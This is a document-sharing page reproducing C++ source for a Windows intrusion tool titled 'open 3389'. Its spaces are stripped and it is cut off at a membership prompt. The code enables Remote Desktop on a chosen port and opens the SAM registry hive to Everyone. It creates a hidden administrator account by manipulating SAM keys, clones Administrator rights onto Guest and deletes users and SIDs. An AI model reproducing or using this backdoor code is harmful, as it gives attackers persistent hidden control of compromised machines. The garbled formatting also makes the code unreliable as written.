开3389源代码.docx
《开3389源代码.docx》由会员分享,可在线阅读,更多相关《开3389源代码.docx(25页珍藏版)》请在冰豆网上搜索。
开3389源代码
//open3389.cpp:
Definestheentrypointfortheconsoleapplication.
//
#include"stdafx.h"
#include
#include
#include"Registry.h"
//#include"CloneSID.h"
#include"FindPass.h"
#include
#include
#pragmacomment(lib,"netapi32.lib")
voidOpen3389(DWORDport)
{
CRegistryreg;
reg.Open("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\0");
reg.CreateKey("netcache");
reg.WriteString("Enabled","0");
reg.Open("SOFTWARE\\Policies\\Microsoft\\Windows\0");
reg.CreateKey("Installer");
reg.WriteDword("EnableAdminTSRemote",1);
if(reg.Open("SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon\0"))
reg.WriteString("ShutdownWithoutLogon","0");
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\0"))
reg.WriteDword("TSEnabled",1);
if(reg.Open("SYSTEM\\CurrentControlSet\\Services\\TermDD\0"))
reg.WriteDword("Start",2);
if(reg.Open("SYSTEM\\CurrentControlSet\\Services\\TermService\0"))
reg.WriteDword("Start",2);
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\0"))
reg.WriteDword("fDenyTSConnections",0);
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\RDPTcp\0"))
reg.WriteDword("PortNumber",port);
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\WinStations\\RDP-Tcp\0"))
reg.WriteDword("PortNumber",port);
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp\0"))
reg.WriteDword("PortNumber",port);
reg.ReSetMainKey(HKEY_USERS);
if(reg.Open(".DEFAULT\\KeyboardLayout\\Toggle\0"))
reg.WriteString("Hotkey","2");
reg.Close();
}
voidResetTermsPort(DWORDport)
{
CRegistryreg;
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\RDPTcp\0"))
reg.WriteDword("PortNumber",port);
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\WinStations\\RDP-Tcp\0"))
reg.WriteDword("PortNumber",port);
if(reg.Open("SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp\0"))
reg.WriteDword("PortNumber",port);
}
char*GetUserSID(TCHAR*user)
{
HKEYhKey;
DWORDdwValue;
char*ret=NULL;
charstrType[32];
DWORDdwRegType;
TCHARlpSubKey[128];
wsprintf(lpSubKey,"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s",user);
if(0==RegOpenKey(HKEY_LOCAL_MACHINE,lpSubKey,&hKey))
{
DWORDdwLen=sizeof(DWORD);
RegQueryValueEx(hKey,"",NULL,&dwRegType,(BYTE*)&dwValue,&dwLen);
RegCloseKey(hKey);
wsprintf(strType,"%-20s\t-SID->%08X",user,dwRegType);
ret=strType;
}
else
ret="NULL";
returnret;
}
BOOLGetSecurity()
{
DWORDdwRet;
LPSTRSamName="MACHINE\\SAM\\SAM";
PSECURITY_DESCRIPTORpSD=NULL;
PACLpOldDacl=NULL;
PACLpNewDacl=NULL;
EXPLICIT_ACCESSea;
HKEYhKey=NULL;
dwRet=GetNamedSecurityInfo(SamName,SE_REGISTRY_KEY,DACL_SECURITY_INFORMATION,
NULL,NULL,&pOldDacl,NULL,&pSD);
if(dwRet!
=ERROR_SUCCESS)
returnFALSE;
ZeroMemory(&ea,sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea,"Everyone",KEY_ALL_ACCESS,SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
dwRet=SetEntriesInAcl(1,&ea,pOldDacl,&pNewDacl);
if(dwRet!
=ERROR_SUCCESS)
returnFALSE;
dwRet=SetNamedSecurityInfo(SamName,SE_REGISTRY_KEY,DACL_SECURITY_INFORMATION,
NULL,NULL,pNewDacl,NULL);
if(dwRet!
=ERROR_SUCCESS)
returnFALSE;
if(pNewDacl)LocalFree(pNewDacl);
if(pSD)LocalFree(pSD);
returnTRUE;
}
BOOLCreateHideUser(char*user,char*pass)
{
charParam[MAX_PATH];
wsprintf(Param,"user%s%s/add",user,pass);
HINSTANCEnRet=ShellExecute(0,"open","net.exe",Param,NULL,SW_HIDE);
if((int)nRet<=32)
returnFALSE;
printf("Create%sSuccess...\r\n",user);
HKEYhKey;
DWORDdwValue;
charstrType[32];
DWORDdwRegType;
TCHARlpSubKey[128];
wsprintf(lpSubKey,"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s",user);
printf("Open%s...\r\n",lpSubKey);
intnCount=0;
while
(1)
{
if(0==RegOpenKey(HKEY_LOCAL_MACHINE,lpSubKey,&hKey))
{
DWORDdwLen=sizeof(DWORD);
RegQueryValueEx(hKey,"",NULL,&dwRegType,(BYTE*)&dwValue,&dwLen);
RegCloseKey(hKey);
wsprintf(strType,"%08X",dwRegType);
printf("GetRegistryValue%s...\r\n",strType);
break;
}
Sleep(50);
nCount++;
if(nCount>100)
returnFALSE;
}
LPBYTElpDataF,lpDataV;
lpDataF=(LPBYTE)malloc(1024*2);
lpDataV=(LPBYTE)malloc(1024*10);
ZeroMemory(lpDataF,1024*2);
ZeroMemory(lpDataV,1024*10);
DWORDSizeF=1024*2;
DWORDSizeV=1024*10;
if(0==RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\000001F4",0,KEY_ALL_ACCESS,&hKey))
{
DWORDdwType=REG_BINARY;
DWORDdwLen=sizeof(DWORD);
RegQueryValueEx(hKey,"F",NULL,&dwType,lpDataF,&SizeF);
RegCloseKey(hKey);
}
HKEYc_hKey;
TCHARlpSubKey2[128];
wsprintf(lpSubKey2,"SAM\\SAM\\Domains\\Account\\Users\\%s",strType);
printf("Open%s...\r\n",lpSubKey2);
if(0==RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpSubKey2,0,KEY_ALL_ACCESS,&c_hKey))
{
DWORDdwType=REG_BINARY;
DWORDdwLen=sizeof(DWORD);
RegQueryValueEx(c_hKey,"V",NULL,&dwType,lpDataV,&SizeV);
RegCloseKey(c_hKey);
}
wsprintf(Param,"user%s/del",user);
nRet=ShellExecute(0,"open","net.exe",Param,NULL,SW_HIDE);
if((int)nRet<=32)
returnFALSE;
printf("Delete%sSuccess...\r\n",user);
nCount=0;
while
(1)
{
if(ERROR_SUCCESS!
=RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpSubKey,0,KEY_ALL_ACCESS,&c_hKey))
{
if(RegCreateKey(HKEY_LOCAL_MACHINE,lpSubKey,&hKey)==ERROR_SUCCESS)
{
DWORDdwLen=sizeof(DWORD);
DWORDdwValue=NULL;
RegSetValueEx(hKey,"",NULL,dwRegType,NULL,0);
RegCloseKey(c_hKey);
break;
}
}
RegCloseKey(c_hKey);
Sleep(50);
nCount++;
if(nCount>100)
returnFALSE;
}
printf("NowCreate%sRegistryKey...",user);
if(RegCreateKey(HKEY_LOCAL_MACHINE,lpSubKey2,&hKey)==ERROR_SUCCESS)
{
DWORDdwLen=sizeof(DWORD);
DWORDdwValue=NULL;
RegSetValueEx(hKey,"F",NULL,REG_BINARY,lpDataF,SizeF);
RegSetValueEx(hKey,"V",NULL,REG_BINARY,lpDataV,SizeV);
RegCloseKey(hKey);
}
printf("Success!
\r\n");
printf("OK!
\r\nUSER:
%s\r\nPASS:
%s",user,pass);
returnTRUE;
}
BOOLDelSid(char*sid)
{
HKEYhkey;
DWORDret;
charC_sid[10];
if(strncmp(sid,"00000",strlen("00000"))==0)
wsprintf(C_sid,"%s",sid);
else
wsprintf(C_sid,"00000%s",sid);
ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\",&hkey);
if(ret!
=ERROR_SUCCESS)
returnFALSE;
ret=RegDeleteKey(hkey,C_sid);
RegCloseKey(hkey);
if(ret==ERROR_SUCCESS)
returnTRUE;
else
returnFALSE;
}
BOOLDelUser(char*user)
{
HKEYhkey;
DWORDret;
charC_user[40];
wsprintf(C_user,"%s",user);
ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\Names\\",&hkey);
if(ret!
=ERROR_SUCCESS)
returnFALSE;
ret=RegDeleteKey(hkey,C_user);
RegCloseKey(hkey);
if(ret==ERROR_SUCCESS)
returnTRUE;
else
returnFALSE;
}
BOOLCloneID()
{
HKEYhkey,C_hkey;
DWORDType=REG_BINARY,SizeF=1024*2,SizeV=1024*10,ret;
charCloneSid[100];
LPBYTElpDataF;
LPBYTElpDataV;
lpDataF=(LPBYTE)malloc(1024*2);
lpDataV=(LPBYTE)malloc(1024*2);
ZeroMemory(lpDataF,1024*2);
ZeroMemory(lpDataV,1024*2);
wsprintf(CloneSid,"SAM\\SAM\\Domains\\Account\\Users\\000001F5");
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\000001F4",0,KEY_ALL_ACCESS,&hkey);
if(ret!
=ERROR_SUCCESS)
returnFALSE;
ret=RegQueryValueEx(hkey,"F",NULL,&Type,lpDataF,&SizeF);
if(ret!
=ERROR_SUCCESS)
returnFALSE;
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,CloneSid,0,KEY_ALL_ACCESS,&C_hkey);
if(ret!
=ERROR_SUCCESS)
returnFALSE;
ret=RegSetValueEx(C_hkey,"F",0,REG_BINARY,lpDataF,SizeF);
if(ret==ERROR_SUCCESS)
printf("CloneUserSuccess\n");
else
{
printf("CloneUserFAIL\n");
returnFALSE;
}
RegCloseKey(hkey);
RegCloseKey(C_hkey);
returnTRUE;
}
char*ListUser()
{
charTemp[1024]={0};
charretbuf[4096]={0};
LPUSER_INFO_3pBuf=NULL;
LPUSER_INFO_3pTmpBuf;
DWORDi;
DWORDdwLevel=3;
DWORDdwPrefMaxLen=-1;
DWORDdwEntriesRead=0;
DWORDdwTotalEntries=0;
DWORDdwResumeHandle=0;
LPTSTRpszServerName=NULL;
NET_API_STATUSnStatus;
sprintf(Temp,"\r\n%-20s\t%-16s%-7s\r\n\r\n","USER","SID","DOMAIN");
strcpy(retbuf,Temp);
do
{
nStatus=NetUserEnum(NULL,dwLevel,FILTER_NORMAL_ACCOUNT,(LPBYTE*)&pBuf,
dwPrefMaxLen,&dwEntriesRead,&dwTotalEntries,&dwResumeHandle);
if((nStatus==NERR_Success)||(nStatus==ERROR_MORE_DATA))
{
if((pTmpBuf=pBuf)!
=NULL)
{
for(i=0;(i{
if(pTmpBuf==NULL)
{
sprintf(Temp,"AnAccessViolationHasOccurred\r\n");
strcat(retbuf,Temp);
break;
}
sprintf(Temp,"%S",pTmpBuf->usri3_name);
strcat(retbuf,GetUserSID(Temp));
switch(pTmpBuf->usri3_priv)
{
caseUSER_PRIV_GUEST:
sprintf(Temp,"\t->%-7s\t\r\n","(Guest)");
break;
caseUSER_PRIV_USER:
sprintf(Temp,"\t->%-7s\t\r\n","(User)");
break;
caseUSER_PRIV_ADMIN:
sprintf(Temp,"\t->%-10s\t\r\n","(Administrator)");
break;
default:
sprintf(Temp,"\t->%-7s\t\r\n","(Unknow)");
break;
}//for
pTmpBuf++;
strcat(retbuf,Temp);
}//if
}
sprintf(Temp,"\r\nOK...\r\n");
}
else
sprintf(Temp,"\r\nNetUserEnumError:
%d\r\n",GetLastError());
strcat(retbuf,Temp);
if(pBuf!
=NULL)
{
NetApiBufferFree(pBuf);
pBuf=
升级会员 